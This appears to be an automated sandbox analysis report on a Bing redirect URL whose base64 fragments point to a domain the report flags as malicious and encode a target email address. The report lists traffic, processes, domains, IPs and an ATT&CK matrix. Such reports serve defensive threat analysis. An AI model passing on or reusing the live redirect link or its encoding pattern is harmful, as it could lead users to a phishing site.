Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.181.0:443 -> 192.168.2.17:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: classification engineClassification label: mal48.win@27/158@158/371
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1916,i,14681166411600306776,10979207420218593879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1916,i,14681166411600306776,10979207420218593879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s.tribalfusion.com
172.64.150.63
truefalse
    high
    tbztnyz7p65ro81mjjn8pl20tbe8av4bxaz6erw6vjtxm6goe59fx.lpliwptf.ru
    172.67.158.68
    truefalse
      unknown
      global.px.quantserve.com
      91.228.74.200
      truefalse
        high
        s-part-0035.t-0009.t-msedge.net
        13.107.246.63
        truefalse
          high
          cia.vomivor.ru
          172.67.193.76
          truetrue
            unknown
            eu-eb2.3lift.com
            13.248.245.213
            truefalse
              high
              bttrack.com
              192.132.33.68
              truefalse
                high
                adobetarget.data.adobedc.net
                66.235.152.156
                truefalse
                  high
                  idsync.rlcdn.com
                  35.244.154.8
                  truefalse
                    high
                    code.jquery.com
                    151.101.2.137
                    truefalse
                      high
                      sync.crwdcntrl.net
                      13.250.84.149
                      truefalse
                        high
                        cdnjs.cloudflare.com
                        104.17.25.14
                        truefalse
                          high
                          publisher.liveperson.net
                          34.120.154.120
                          truefalse
                            high
                            cm.g.doubleclick.net
                            142.250.181.2
                            truefalse
                              high
                              sni1gl.wpc.omegacdn.net
                              152.199.21.175
                              truefalse
                                high
                                rtb.adentifi.com
                                100.24.163.168
                                truefalse
                                  high
                                  www.google.com
                                  142.250.181.100
                                  truefalse
                                    high
                                    dcs-ups.g03.yahoodns.net
                                    188.125.88.204
                                    truefalse
                                      high
                                      dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                      52.211.121.244
                                      truefalse
                                        high
                                        msftenterprise.sc.omtrdc.net
                                        63.140.62.17
                                        truefalse
                                          high
                                          match.adsrvr.org
                                          3.33.220.150
                                          truefalse
                                            high
                                            a.nel.cloudflare.com
                                            35.190.80.1
                                            truefalse
                                              high
                                              s.twitter.com
                                              104.244.42.3
                                              truefalse
                                                high
                                                aragorn-prod-or-acai-lb.inbake.com
                                                52.41.210.176
                                                truefalse
                                                  high
                                                  www.yuxingketang.com
                                                  104.21.17.162
                                                  truefalse
                                                    high
                                                    dsum-sec.casalemedia.com
                                                    104.18.26.193
                                                    truefalse
                                                      high
                                                      a.tribalfusion.com
                                                      172.64.150.63
                                                      truefalse
                                                        high
                                                        challenges.cloudflare.com
                                                        104.18.94.41
                                                        truefalse
                                                          high
                                                          dh1y47vf5ttia.cloudfront.net
                                                          18.66.161.117
                                                          truefalse
                                                            unknown
                                                            ib.anycast.adnxs.com
                                                            185.89.210.153
                                                            truefalse
                                                              high
                                                              js.monitor.azure.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                ag.innovid.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  idpix.media6degrees.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    va.v.liveperson.net
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      px.owneriq.net
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        cm.everesttech.net
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          static-assets.fs.liveperson.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            jadserve.postrelease.com
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              z.clarity.ms
                                                                              unknown
                                                                              unknownfalse
                                                                                high
                                                                                dmpsync.3lift.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  accdn.lpsnmedia.net
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    high
                                                                                    assets.adobedtm.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      rtd.tubemogul.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        aadcdn.msftauth.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          pixel.rubiconproject.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            munchkin.marketo.net
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              cms.analytics.yahoo.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high
                                                                                                sync-tm.everesttech.net
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  lpcdn.lpsnmedia.net
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    ds.reson8.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      ups.analytics.yahoo.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        cdn.botframework.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          high
                                                                                                          dpm.demdex.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            rtd-tm.everesttech.net
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              high
                                                                                                              servedby.flashtalking.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                high
                                                                                                                www.clarity.ms
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  high
                                                                                                                  mscom.demdex.net
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    high
                                                                                                                    play.vidyard.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      analytics.twitter.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        high
                                                                                                                        cms.quantserve.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          ib.adnxs.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            high
                                                                                                                            login.microsoftonline.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              high
                                                                                                                              lptag.liveperson.net
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                high
                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                https://www.yuxingketang.com/collections/throw-blankets/#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tfalse
                                                                                                                                  unknown
                                                                                                                                  https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY29tfalse
                                                                                                                                    unknown
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    23.47.232.109
                                                                                                                                    unknownUnited States
                                                                                                                                    18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                                                                                                                                    20.189.173.8
                                                                                                                                    unknownUnited States
                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    91.228.74.200
                                                                                                                                    global.px.quantserve.comUnited Kingdom
                                                                                                                                    27281QUANTCASTUSfalse
                                                                                                                                    52.41.210.176
                                                                                                                                    aragorn-prod-or-acai-lb.inbake.comUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    104.18.9.76
                                                                                                                                    unknownUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    35.244.154.8
                                                                                                                                    idsync.rlcdn.comUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    185.89.210.153
                                                                                                                                    ib.anycast.adnxs.comGermany
                                                                                                                                    29990ASN-APPNEXUSfalse
                                                                                                                                    54.154.234.207
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    52.167.30.171
                                                                                                                                    unknownUnited States
                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    34.120.154.120
                                                                                                                                    publisher.liveperson.netUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    66.235.152.221
                                                                                                                                    unknownUnited States
                                                                                                                                    15224OMNITUREUSfalse
                                                                                                                                    23.218.208.236
                                                                                                                                    unknownUnited States
                                                                                                                                    6453AS6453USfalse
                                                                                                                                    172.64.146.217
                                                                                                                                    unknownUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    151.101.66.137
                                                                                                                                    unknownUnited States
                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                    35.190.80.1
                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    69.173.144.165
                                                                                                                                    unknownUnited States
                                                                                                                                    26667RUBICONPROJECTUSfalse
                                                                                                                                    104.21.17.162
                                                                                                                                    www.yuxingketang.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    3.33.220.150
                                                                                                                                    match.adsrvr.orgUnited States
                                                                                                                                    8987AMAZONEXPANSIONGBfalse
                                                                                                                                    1.1.1.1
                                                                                                                                    unknownAustralia
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    13.107.21.237
                                                                                                                                    unknownUnited States
                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    13.248.245.213
                                                                                                                                    eu-eb2.3lift.comUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    18.66.161.117
                                                                                                                                    dh1y47vf5ttia.cloudfront.netUnited States
                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                    172.217.17.35
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    54.155.160.118
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    151.101.130.49
                                                                                                                                    unknownUnited States
                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                    172.64.150.63
                                                                                                                                    s.tribalfusion.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    104.244.42.131
                                                                                                                                    unknownUnited States
                                                                                                                                    13414TWITTERUSfalse
                                                                                                                                    63.140.62.17
                                                                                                                                    msftenterprise.sc.omtrdc.netUnited States
                                                                                                                                    15224OMNITUREUSfalse
                                                                                                                                    239.255.255.250
                                                                                                                                    unknownReserved
                                                                                                                                    unknownunknownfalse
                                                                                                                                    66.235.152.156
                                                                                                                                    adobetarget.data.adobedc.netUnited States
                                                                                                                                    15224OMNITUREUSfalse
                                                                                                                                    152.199.21.175
                                                                                                                                    sni1gl.wpc.omegacdn.netUnited States
                                                                                                                                    15133EDGECASTUSfalse
                                                                                                                                    13.250.84.149
                                                                                                                                    sync.crwdcntrl.netUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    104.17.25.14
                                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    172.217.19.206
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    13.107.246.63
                                                                                                                                    s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    20.233.12.48
                                                                                                                                    unknownUnited States
                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    152.199.19.160
                                                                                                                                    unknownUnited States
                                                                                                                                    15133EDGECASTUSfalse
                                                                                                                                    172.217.17.46
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    104.18.94.41
                                                                                                                                    challenges.cloudflare.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    151.101.2.49
                                                                                                                                    unknownUnited States
                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                    208.89.12.87
                                                                                                                                    unknownUnited States
                                                                                                                                    11054LIVEPERSONUSfalse
                                                                                                                                    63.140.62.27
                                                                                                                                    unknownUnited States
                                                                                                                                    15224OMNITUREUSfalse
                                                                                                                                    178.249.97.99
                                                                                                                                    unknownUnited Kingdom
                                                                                                                                    11054LIVEPERSONUSfalse
                                                                                                                                    20.190.147.1
                                                                                                                                    unknownUnited States
                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    100.24.163.168
                                                                                                                                    rtb.adentifi.comUnited States
                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                    172.217.21.35
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    20.190.147.10
                                                                                                                                    unknownUnited States
                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    2.16.1.179
                                                                                                                                    unknownEuropean Union
                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                    2.16.158.34
                                                                                                                                    unknownEuropean Union
                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                    192.132.33.68
                                                                                                                                    bttrack.comUnited States
                                                                                                                                    18568BIDTELLECTUSfalse
                                                                                                                                    104.17.24.14
                                                                                                                                    unknownUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    184.85.177.135
                                                                                                                                    unknownUnited States
                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                    52.211.121.244
                                                                                                                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    54.191.117.1
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    184.30.21.171
                                                                                                                                    unknownUnited States
                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                    172.67.158.68
                                                                                                                                    tbztnyz7p65ro81mjjn8pl20tbe8av4bxaz6erw6vjtxm6goe59fx.lpliwptf.ruUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    188.125.88.204
                                                                                                                                    dcs-ups.g03.yahoodns.netUnited Kingdom
                                                                                                                                    10310YAHOO-1USfalse
                                                                                                                                    104.18.26.193
                                                                                                                                    dsum-sec.casalemedia.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    178.249.97.23
                                                                                                                                    unknownUnited Kingdom
                                                                                                                                    11054LIVEPERSONUSfalse
                                                                                                                                    104.244.42.3
                                                                                                                                    s.twitter.comUnited States
                                                                                                                                    13414TWITTERUSfalse
                                                                                                                                    184.30.20.187
                                                                                                                                    unknownUnited States
                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                    20.10.16.51
                                                                                                                                    unknownUnited States
                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                    172.67.193.76
                                                                                                                                    cia.vomivor.ruUnited States
                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                    151.101.1.181
                                                                                                                                    unknownUnited States
                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                    142.250.181.100
                                                                                                                                    www.google.comUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    151.101.2.137
                                                                                                                                    code.jquery.comUnited States
                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                    34.217.153.224
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    151.101.129.181
                                                                                                                                    unknownUnited States
                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                    142.250.181.2
                                                                                                                                    cm.g.doubleclick.netUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    54.75.138.108
                                                                                                                                    unknownUnited States
                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                    64.233.163.84
                                                                                                                                    unknownUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    IP
                                                                                                                                    192.168.2.4
                                                                                                                                    192.168.2.17
                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1576880
                                                                                                                                    Start date and time:2024-12-17 17:26:56 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                    Sample URL:https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:21
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • EGA enabled
                                                                                                                                    Analysis Mode:stream
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal48.win@27/158@158/371
                                                                                                                                    • Exclude process from analysis (whitelisted): TextInputHost.exe
